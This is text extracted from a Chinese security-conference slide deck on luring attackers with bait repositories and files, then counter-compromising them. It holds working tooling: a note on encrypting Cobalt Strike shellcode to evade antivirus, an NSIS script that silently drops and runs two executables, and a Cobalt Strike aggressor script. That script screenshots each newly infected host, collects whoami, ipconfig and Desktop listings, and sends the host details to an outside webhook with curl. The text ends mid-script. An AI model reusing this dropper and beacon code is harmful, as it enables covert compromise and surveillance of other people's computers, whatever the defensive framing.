平安SRC沙龙：从实战角度总结反制思路.pptx

从实战角度总结反制思路 演讲嘉宾 张天力 平安健康互联网 《从实战角度总结反制思路》 目录 CONTENTS 反制与溯源介绍 PART 1 反制与溯源 01 在传统攻防对抗中，防守方一般都处在被动的一面，只能被动的接受攻击，溯源技术可以通过攻击行为的特征追踪到行为主体的攻击主机、攻击控制主机、攻击者、攻击组织机构等信息。 01 溯源技术与反制技术是相辅相成的。大部分溯源工作只能利用现有的安全设备的告警去提取有用信息进行溯源，随着攻防演练的模式日趋成熟，攻击者对隐藏自己入侵痕迹也更佳得心应手，只依赖溯源技术效果减退。 攻击反制技术与常规溯源技术完全相反，防守方可以在前期准备时在互联网上刻意部署一些诱导信息，比如github诱饵、各类网盘信息、伪装的脚本、伪装的漏洞服务，攻击者在进行信息收集之后会尝试进行深入利用，防守人员即可通过已部署好的诱捕蜜罐反制攻击者，从攻击者的vps上获取其个人信息从而达到溯源目的，这样防守人员从被动化为主动。 反制与溯源 诱捕与反制 PART 2 02 布防准备 攻击者进行攻击 防守方反制 溯源 前期准备 前期部署蜜罐与布防散步消息。 攻击者攻击 攻击者收集信息收集到诱捕蜜罐进行攻击 反制 防守人员通过诱捕机制反制攻击者获取权限 溯源 诱捕与反制实战 收集攻击者详细的身份信息。 02 诱捕与反制实战 如何诱捕？ Github 百度云 百度文库 FREEBUF 01 诱捕与反制实战 好饵 01 诱捕与反制实战 好钩 木马免杀 通常是CS客户端生成远控shellcode， 然后对shellcode进行加密。 02 诱捕与反制实战 好钩 NSIS解压释放 !define MUI_ICON X:\nsis\xx.ico Icon X:\nsis\xx.ico Outfile XX.exe InstallDir $TEMP SetCompressor /SOLID lzma SilentInstall silent SilentUninstall silent Section HideWindow File XX.exe File XXX.exe Exec XX.exe Exec XXX.exe Delete $XX.exe Delete $XXX.exe SectionEnd 02 好饵+好钩？没有渔具怎么行 诱捕与反制实战 02 好饵+好钩？没有渔具怎么行 诱捕与反制实战 #Screenshot when shangxian.. $teamserver_hostname = ; on beacon_initial { println(Initial Beacon Checkin: . $1 . PID: . beacon_info($1, pid)); local($internalIP $computerName $userName); bscreenshot($1,0); bshell($1,echo ========== ipconfig /all echo ---------- whoami echo ---------- date /t echo ---------- time /t echo ========== dir C:\Users\.$userName.\Desktop echo ----------); $internalIP = replace(beacon_info($1, internal), , _); $computerName = replace(beacon_info($1, computer), , _); $userName = replace(beacon_info($1, user), \s+|\*, ); $message = Message from .$teamserver_hostname. Server\n目标成功上线:\n计算名 : .$computerName.\n用户名 : .$userName.\nIP地址 : .$internalIP; @curl_command = @(curl,/robot/send?access_token=XXX,-H,Content-Type: application/json,-d,{msgtype: text,text: {content: Cobalt Strike 上线了一台主机\n.$message.\n},at: {isAtAll:true}}); exec(@curl_command); } on r